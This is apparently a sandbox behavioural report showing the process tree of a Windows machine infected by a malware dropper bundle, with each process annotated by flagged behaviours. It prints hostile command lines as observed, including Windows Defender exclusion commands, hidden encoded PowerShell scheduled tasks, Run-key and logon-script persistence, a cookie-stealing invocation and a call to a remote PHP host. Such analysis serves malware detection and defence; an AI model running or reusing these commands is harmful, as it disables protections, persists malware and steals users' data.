C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1608,5196052382749705715,1486235968488276714,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1620 /prefetch:818⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ftwo1lor.1ds\customer6.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\ftwo1lor.1ds\customer6.exeC:\Users\Admin\AppData\Local\Temp\ftwo1lor.1ds\customer6.exe16⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"17⤵
- Loads dropped DLL
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vhb2xpfd.rlr\HookSetp.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\vhb2xpfd.rlr\HookSetp.exeC:\Users\Admin\AppData\Local\Temp\vhb2xpfd.rlr\HookSetp.exe16⤵
-
C:\ProgramData\1114116.exe"C:\ProgramData\1114116.exe"17⤵
- Suspicious behavior: SetClipboardViewer
-
C:\ProgramData\5626467.exe"C:\ProgramData\5626467.exe"17⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\whbcvc4x.rhv\19.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\whbcvc4x.rhv\19.exeC:\Users\Admin\AppData\Local\Temp\whbcvc4x.rhv\19.exe16⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\install.vbs"17⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5amzuu1z.los\setup_10.2_mix.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\5amzuu1z.los\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\5amzuu1z.los\setup_10.2_mix.exe16⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\App\app.bat" "17⤵
- Checks computer location settings
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV118⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cniqqfks.s24\GcleanerWW.exe /mixone & exit15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e5nfsqsu.bdq\b9706c20.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\e5nfsqsu.bdq\b9706c20.exeC:\Users\Admin\AppData\Local\Temp\e5nfsqsu.bdq\b9706c20.exe16⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vrh15dsp.0gs\setup.exe /8-2222 & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\vrh15dsp.0gs\setup.exeC:\Users\Admin\AppData\Local\Temp\vrh15dsp.0gs\setup.exe /8-222216⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Late-Breeze'17⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pg45mn3q.jsd\Four.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\pg45mn3q.jsd\Four.exeC:\Users\Admin\AppData\Local\Temp\pg45mn3q.jsd\Four.exe16⤵
-
C:\Users\Admin\AppData\Local\Temp\RPGIDRZA2U\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\RPGIDRZA2U\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10417⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\RPGIDRZA2U\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\RPGIDRZA2U\multitimer.exe" 1 3.1617022594.6061ce824613b 10418⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\RPGIDRZA2U\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\RPGIDRZA2U\multitimer.exe" 2 3.1617022594.6061ce824613b19⤵
- Maps connected drives based on registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\WSEPT99PNL\setups.exe"C:\Users\Admin\AppData\Local\Temp\WSEPT99PNL\setups.exe" ll17⤵
-
C:\Users\Admin\AppData\Local\Temp\is-G9HDB.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-G9HDB.tmp\setups.tmp" /SL5="$403F8,587771,264704,C:\Users\Admin\AppData\Local\Temp\WSEPT99PNL\setups.exe" ll18⤵
- Checks computer location settings
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2mfl1xlj.zty\setup.exe /S /kr /site_id=754 & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\2mfl1xlj.zty\setup.exeC:\Users\Admin\AppData\Local\Temp\2mfl1xlj.zty\setup.exe /S /kr /site_id=75416⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"17⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&18⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6419⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3219⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gAmifXGUX" /SC once /ST 09:27:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="17⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gAmifXGUX"17⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gAmifXGUX"17⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bmIXAqnwlcZKDlfrrr" /SC once /ST 14:54:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\fcNgRpc.exe\" 9n /site_id 754 /S" /V1 /F17⤵
- Drops file in Windows directory
- Creates scheduled task(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\16-eef95-10e-9a9a8-f112732e825ab\Pisysikyqu.exe"C:\Users\Admin\AppData\Local\Temp\16-eef95-10e-9a9a8-f112732e825ab\Pisysikyqu.exe"14⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Program Files (x86)\VR\Versium Research\LabPicV3.exe"C:\Program Files (x86)\VR\Versium Research\LabPicV3.exe"11⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-47NN2.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-47NN2.tmp\LabPicV3.tmp" /SL5="$3055E,239334,155648,C:\Program Files (x86)\VR\Versium Research\LabPicV3.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-SQOLG.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-SQOLG.tmp\ppppppfy.exe" /S /UID=lab21413⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\VideoLAN\PFBXJZZNUM\prolab.exe"C:\Program Files\VideoLAN\PFBXJZZNUM\prolab.exe" /VERYSILENT14⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-5IJR3.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-5IJR3.tmp\prolab.tmp" /SL5="$604DC,575243,216576,C:\Program Files\VideoLAN\PFBXJZZNUM\prolab.exe" /VERYSILENT15⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\fb-408b9-620-2a59a-177e84738c156\Lepaelimerae.exe"C:\Users\Admin\AppData\Local\Temp\fb-408b9-620-2a59a-177e84738c156\Lepaelimerae.exe"14⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0orrek12.zyp\gaooo.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\0orrek12.zyp\gaooo.exeC:\Users\Admin\AppData\Local\Temp\0orrek12.zyp\gaooo.exe16⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0aixlhhe.yw1\md7_7dfj.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\0aixlhhe.yw1\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\0aixlhhe.yw1\md7_7dfj.exe16⤵
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tlo0pkec.m3t\askinstall31.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\tlo0pkec.m3t\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\tlo0pkec.m3t\askinstall31.exe16⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2jtsbaqq.uxm\customer6.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\2jtsbaqq.uxm\customer6.exeC:\Users\Admin\AppData\Local\Temp\2jtsbaqq.uxm\customer6.exe16⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"17⤵
- Loads dropped DLL
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\csusm0ng.g55\HookSetp.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\csusm0ng.g55\HookSetp.exeC:\Users\Admin\AppData\Local\Temp\csusm0ng.g55\HookSetp.exe16⤵
-
C:\ProgramData\7901573.exe"C:\ProgramData\7901573.exe"17⤵
-
C:\ProgramData\6616674.exe"C:\ProgramData\6616674.exe"17⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h4ior2ma.5gd\19.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\h4ior2ma.5gd\19.exeC:\Users\Admin\AppData\Local\Temp\h4ior2ma.5gd\19.exe16⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\install.vbs"17⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install18⤵
- Loads dropped DLL
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jcazf53m.raf\setup_10.2_mix.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\jcazf53m.raf\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\jcazf53m.raf\setup_10.2_mix.exe16⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s3zomplp.hfp\GcleanerWW.exe /mixone & exit15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qbcbfzsi.s42\b9706c20.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\qbcbfzsi.s42\b9706c20.exeC:\Users\Admin\AppData\Local\Temp\qbcbfzsi.s42\b9706c20.exe16⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xhiirz0c.jki\setup.exe /8-2222 & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\xhiirz0c.jki\setup.exeC:\Users\Admin\AppData\Local\Temp\xhiirz0c.jki\setup.exe /8-222216⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Young-Fog'17⤵
-
C:\Program Files (x86)\Young-Fog\7za.exe"C:\Program Files (x86)\Young-Fog\7za.exe" e -p154.61.71.13 winamp.7z17⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Young-Fog\setup.exe"C:\Program Files (x86)\Young-Fog\setup.exe" /8-222217⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jboy1czv.vnz\setup.exe /S /kr /site_id=754 & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\jboy1czv.vnz\setup.exeC:\Users\Admin\AppData\Local\Temp\jboy1czv.vnz\setup.exe /S /kr /site_id=75416⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"17⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&18⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3219⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6419⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gwxWVhQsT" /SC once /ST 12:14:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="17⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gwxWVhQsT"17⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gwxWVhQsT"17⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bmIXAqnwlcZKDlfrrr" /SC once /ST 14:53:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\MUXPNae.exe\" 9n /site_id 754 /S" /V1 /F17⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rj2nnnou.2hp\Four.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\rj2nnnou.2hp\Four.exeC:\Users\Admin\AppData\Local\Temp\rj2nnnou.2hp\Four.exe16⤵
-
C:\Users\Admin\AppData\Local\Temp\EPLFN276JQ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\EPLFN276JQ\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10417⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\EPLFN276JQ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\EPLFN276JQ\multitimer.exe" 1 3.1617022544.6061ce5050a7b 10418⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\EPLFN276JQ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\EPLFN276JQ\multitimer.exe" 2 3.1617022544.6061ce5050a7b19⤵
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\qcisplvv22n\vict.exe"C:\Users\Admin\AppData\Local\Temp\qcisplvv22n\vict.exe" /VERYSILENT /id=53520⤵
- Checks computer location settings
- Checks whether UAC is enabled
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\is-9GARR.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-9GARR.tmp\vict.tmp" /SL5="$40534,870426,780800,C:\Users\Admin\AppData\Local\Temp\qcisplvv22n\vict.exe" /VERYSILENT /id=53521⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\is-KLENK.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-KLENK.tmp\win1host.exe" 53522⤵
-
C:\Users\Admin\AppData\Local\Temp\0u3atlb5rbn\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\0u3atlb5rbn\AwesomePoolU1.exe"20⤵
-
C:\Users\Admin\AppData\Local\Temp\j2pxvxmkffw\v5wpqe0q5l3.exe"C:\Users\Admin\AppData\Local\Temp\j2pxvxmkffw\v5wpqe0q5l3.exe" /1-61020⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Autumn-Wave'21⤵
-
C:\Users\Admin\AppData\Local\Temp\rurdutud125\bevkagomcxv.exe"C:\Users\Admin\AppData\Local\Temp\rurdutud125\bevkagomcxv.exe" /ustwo INSTALL20⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7704 -s 64821⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7704 -s 66421⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7704 -s 80021⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7704 -s 78021⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7704 -s 86821⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7704 -s 92021⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7704 -s 114021⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7704 -s 113221⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\xjkvz5xgmyl\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\xjkvz5xgmyl\Setup3310.exe" /Verysilent /subid=57720⤵
-
C:\Users\Admin\AppData\Local\Temp\nnuce33rf5s\app.exe"C:\Users\Admin\AppData\Local\Temp\nnuce33rf5s\app.exe" /8-2320⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Black-Glade'21⤵
-
C:\Users\Admin\AppData\Local\Temp\4ZDBCIK7FO\setups.exe"C:\Users\Admin\AppData\Local\Temp\4ZDBCIK7FO\setups.exe" ll17⤵
-
C:\Users\Admin\AppData\Local\Temp\is-HSULB.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-HSULB.tmp\setups.tmp" /SL5="$A057A,587771,264704,C:\Users\Admin\AppData\Local\Temp\4ZDBCIK7FO\setups.exe" ll18⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\09-9f4a4-c81-31487-623d8adfbccae\Luvaewekabe.exe"C:\Users\Admin\AppData\Local\Temp\09-9f4a4-c81-31487-623d8adfbccae\Luvaewekabe.exe"14⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Program Files (x86)\VR\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\VR\Versium Research\jg7_7wjg.exe"11⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\r4ya3wr1br5\vpn.exe"C:\Users\Admin\AppData\Local\Temp\r4ya3wr1br5\vpn.exe" /silent /subid=4828⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-SOEL2.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-SOEL2.tmp\vpn.tmp" /SL5="$203D4,15170975,270336,C:\Users\Admin\AppData\Local\Temp\r4ya3wr1br5\vpn.exe" /silent /subid=4829⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\woyqemgwg04\vict.exe"C:\Users\Admin\AppData\Local\Temp\woyqemgwg04\vict.exe" /VERYSILENT /id=5358⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-CCH8O.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-CCH8O.tmp\vict.tmp" /SL5="$103E0,870426,780800,C:\Users\Admin\AppData\Local\Temp\woyqemgwg04\vict.exe" /VERYSILENT /id=5359⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-CAOSK.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-CAOSK.tmp\win1host.exe" 53510⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 46811⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\dhevhftd44l\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\dhevhftd44l\AwesomePoolU1.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\lanalugq3sl\xal3k1mgbcp.exe"C:\Users\Admin\AppData\Local\Temp\lanalugq3sl\xal3k1mgbcp.exe" /ustwo INSTALL8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 6489⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 6649⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 6729⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 6809⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 9089⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 9129⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 11929⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 11569⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 11849⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\hpqq4xzvwup\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\hpqq4xzvwup\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-3JRGE.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-3JRGE.tmp\IBInstaller_97039.tmp" /SL5="$203D8,14517664,721408,C:\Users\Admin\AppData\Local\Temp\hpqq4xzvwup\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-05F4D.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-05F4D.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-05F4D.tmp\{app}\chromium_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-05F4D.tmp\{app}\chromium_proxy.exe"10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-05F4D.tmp\{app}\chromium_proxy.exe"11⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 412⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://hostoryarticlesclub.com/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵
- Checks computer location settings
-
